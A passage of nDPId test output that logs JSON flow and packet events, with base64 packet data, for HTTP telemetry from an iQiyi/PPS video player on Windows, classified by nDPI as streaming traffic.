C1GcmFtZS1PcHRpb25zOiBTQU1FT1JJR0lODQpBZ2U6IDIxNzg0OQ0KQ2FjaGUtQ29udHJvbDogcHVibGljLCBtYXgtYWdlPTM0NTYwMA0KDQowggHLCgEAoIIBxDCCAcAGCSsGAQUFBzABAQSCAbEwggGtMIGWohYEFErdBhYbvPZotXb1gba7Yhq6WoEvGA8yMDE2MDYyODA3MDAxN1owazBpMEEwCQYFKw4DAhoFAAQU8uBq+YWKHY1wm0kZI3qptRoofmQEFErdBhYbvPZotXb1gba7Yhq6WoEvAghGKxV5KtroM4AAGA8yMDE2MDYyODA3MDAxN1qgERgPMjAxNjA3MDUwNzAwMTdaMA0GCSqGSIb3DQEBCwUAA4IBAQBKs877cfA5B2KGhwFSvIyUBYVxkUFjApJpIKog7zezUT4uRPAvbjktL\/Ds15nk8Y2Znhsf4SdVmf8GlloCQ6IXimfBklwRGn8\/72t77ZQLcabmXBFNBqyfqmRrW1O7lFh1alLxLnbN6PNKIPNv7dkTJVq4NRpJC1H3sykeA3XbH5EEaxhdvWFd1bsvybTiEgn7Bn5bpdXlExvoxRYuc7MLXQAUHRWSGKZpv+UniRokZRHgZy2GbGkQE8sf0PVCXrNjm4qsIXnQvqrF2J2xxFQ5x1wzU7J9l9Av+bPvuQI2mdLqvQskYq3tOxhJ6prFG9fcqt4lJS5E11mkG9tPXiAq"} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7560000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01219{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1467353139505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":629,"pkt_l4_len":595,"thread_ts_msec":1467353139505,"pkt":"TF4M6gNlABxCjnAxCABFAAJnA5RAAIAG6ATAqHMIymwO28UjAFBUZatTb7o85VAYAQQGIwAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRzdGFydCZzdGFydHRtPTEwOTcmcmVzZXQ9MSZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMTkmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 
+01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7560000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1467353139595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139595,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uuZAADMGf2DKbA7bwKhzCABQxSNvujzlVGWtklAYADcmHAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7560000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1467353139627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":573,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":573,"pkt_l4_len":539,"thread_ts_msec":1467353139627,"pkt":"TF4M6gNlABxCjnAxCABFAAIvA51AAIAG6DPAqHMIymwO28UlAFD7uSUWcC90rlAYAQQTNwAAR0VUIC9jb3JlP3Q9NSZhPTImcmE9MSZwZj0yMDEmcD0xMSZwMT0xMTQmcDI9MzAwMCZzZGt0cD0xJmMxPTMxJnI9NDc5NTMxMDAwJmFpZD0xODA5MzIzMDEmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9V2luZG93cyUyMDcmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMzkmaXNsb2NhbD0wJmFzPTAzMTFjNWEwZDU1OTYwNjNkYjU5NDRiZDc2YjZjYmZmJnZlPWIxZjkwZjhkYTZmZTAyNThkMTM2MTZhODA3MGNiOTk3JnBlPSZ2ZnJtPSZjaGw9JmhjZG52PTEwLjAuMC4yOTMmdHBjZD0wJmlzZHJtPTEmaHQ9MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
+01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7560000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7560000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1467353139662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":424,"pkt_l4_len":390,"thread_ts_msec":1467353139662,"pkt":"TF4M6gNlABxCjnAxCABFAAGaA59AAIAG6LXAqHMIymwO7MUmAFBtzkRVA7NFyFAYAQQzoQAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmYT0zNCZjdD1vbmNsaWNrJnR5cGU9cGMmYXM9JmNsdD1wY19wbGF5X3BsYXllcl9jbGljayZtdj01LjIuMTUuMjI0MCZwdT0mcm49MEZFMTcyRUM0NEM0NEI4NkFFRURFNTRBQTAwNTQxQzQ1NzQwNiZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9Mi4wLjEwMi4zMDE0NyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7560000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
+00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1467353139771,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353139771,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0y0pAADMGbvDKbA7swKhzCABQxSYDs0XIbc5Fx1AYAB\/3XQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1467353139779,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139779,"pkt":"ABxCjnAxTF4M6gNlCABFAAC58h9AADMGSCfKbA7bwKhzCABQxSVwL3Su+7knHVAYADbM\/QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7560000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1467353139819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":952,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":952,"pkt_l4_len":918,"thread_ts_msec":1467353139819,"pkt":"TF4M6gNlABxCjnAxCABFAAOqA7FAAIAG5pPAqHMIymwO7MUnAFCB65R9kZemalAYQTdERQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9MXx8NzEwMDAwMDF8fDUwMDAwMDA4NTg4NzR8fDUwMDAwMDA5Mjc1NTh8fHJvbGwmYXM9JmF2PTQuMTAuMDA0JmI9MTgwOTMyMzAxJmM9MzEmY3Q9JmQ9MjE3NSZkaT0mZHA9JmU9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPSZvaT0mcD10JnBwPSZyYz0tMSZyZD05MiZyaT0mcz0xNDY3MzUzMTM4MDQzJnNoPSZzcT0mc3c9JnQ9cyZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
+01302{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7560000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1008,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1467353139866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139866,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5KWZAADMGENDKbA7swKhzCABQxSeRl6ZqgeuX\/1AYACHEyQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7560000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01850{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1467353140628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1100,"pkt_l4_len":1066,"thread_ts_msec":1467353140628,"pkt":"TF4M6gNlABxCjnAxCABFAAQ+A+YAAIAGJdrAqHMIymwO3cUqAFDSWIZQbAIVvVAYKACmwAAAR0VUIC9iP2MxPTYmczE9MSZtYWNpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZjaGFubmVsaWQ9MDAwJm51PSZlPTEzNTI1Mjgmc2U9MTI1MzgxMSZyPTUwMDQ5NDYwMCZhZHVpZD1kMDdkZmQzMGYwZWU0ZTQ4YmJjYWYxMjA4Yzc1ODQ3MSZjdG09MTM3NTIxMSZwbGF5c291cmNlPTAwMTAwNDAwMCZ2aWQ9NTYyZTI2Y2FlZDU2OTU5MDAyMTJlYjMyNTkwNzBmOGEmYWxidW1pZD01MDA0OTQ2MDAmcmE9MiZ0ZD0yMjY1MiZzdWNjZXNzaW9uPTQmdHlwZT0xJnZmcm09My0wMDEwMDQwMDAtY19jb3JnaS0wJmJ1Y2tldD1jX2NvcmdpX21haW4mcmF0cD0xJnBsYXltb2RlPTEmaHU9LTEmaHQ9MCZhcD0wJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZ2ZT0xMzUyNTI4JnBmPTIwMSZwPTExJnAxPTExNCZwMj0xMDExJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9JnY9Mi4wLjEwMi4zMDE0NyZkZT1hMGVlNzdhNTYzODg5N2JlYmZkODU1NWIzMjcwYmVmNiZtdj01LjIuMTUuMjI0MCZrdj0xMC4wLjAuMjkzJnNvdXJjZTE9bWluaXBsYXllciZzb3VyY2UyPW1pbmlwbGF5ZXImc291cmNlMz0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUlZTUlOTklYTgmc291cmNlND0lZTUlYjAlOGYlZTYlOTIlYWQlZTYlOTQlYmUmcGxheV9zb3VyY2U9MSZvcHQ9MCZjbHQ9aG9tZWRsJnNjZW5lPTEmcm49MDAwMDAwMDE0NjczNTMxNDAgSFRUU
C8xLjENCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMDsgQ0lCQTsgQWxleGEgVG9vbGJhcjsgWnVuZSA0LjcpDQpIb3N0OiBtc2cuaXFpeWkuY29tDQpDb25uZWN0aW9uOiBjbG9zZQ0KQ29va2llOiB0YnZlcj1hbHhpLTkuMzk7IGFpZD1kbWVrYzFhUEMzMDA4cA0KDQo="} +01641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1009,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140628,"flow_last_seen":1467353140628,"flow_idle_time":7560000,"flow_min_l4_payload_len":1046,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1046,"flow_avg_l4_payload_len":1046,"midstream":1,"thread_ts_msec":1467353140628,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?c1=6&s1=1&macid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&channelid=000&nu=&e=1352528&se=1253811&r=500494600&aduid=d07dfd30f0ee4e48bbcaf1208c758471&ctm=1375211&playsource=001004000&vid=562e26caed5695900212eb3259070f8a&albumid=500494600&ra=2&td=22652&succession=4&type=1&vfrm=3-001004000-c_corgi-0&bucket=c_corgi_main&ratp=1&playmode=1&hu=-1&ht=0&ap=0&t=201&ct=clt__pl_play&ve=1352528&pf=201&p=11&p1=114&p2=1011&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&v=2.0.102.30147&de=a0ee77a5638897bebfd8555b3270bef6&mv=5.2.15.2240&kv=10.0.0.293&source1=miniplayer&source2=miniplayer&source3=%e5%b0%8f%e6%92%ad%e6%94%be%e5%99%a8&source4=%e5%b0%8f%e6%92%ad%e6%94%be&play_source=1&opt=0&clt=homedl&scene=1&rn=00000001467353140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 
2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CIBA; Alexa Toolbar; Zune 4.7)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353140655,"flow_last_seen":1467353140655,"flow_idle_time":7560000,"flow_min_l4_payload_len":887,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":887,"flow_avg_l4_payload_len":887,"midstream":1,"thread_ts_msec":1467353140655,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1467353140655,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":941,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":941,"pkt_l4_len":907,"thread_ts_msec":1467353140655,"pkt":"TF4M6gNlABxCjnAxCABFAAOfA+lAAIAG5mbAqHMIymwO7MUrAFDgGmOz15qFMlAYQTe3tgAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6MjoxfDImYXY9NC4xMC4wMDQmYj0yMDQwNzY3MDEmYz02JmN0PTUwMDAwMDA5MjY3OTUmZD0xNTgmZGk9JmRwPTcxMDAwMDAxJmU9NTEyYWI3N2RlN2Y2N2Q0OWYyNGQzNTExNzc4MjIwZDAmZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPTUwMDAwMDA4NTYzNDQmb2k9JnA9YSZwcD0mcmM9JnJkPSZyaT0mcz0xNDY3MzUzMTM5MDU3JnNoPSZzcT0mc3c9JnQ9c3AmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NTAwNDk0NjAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl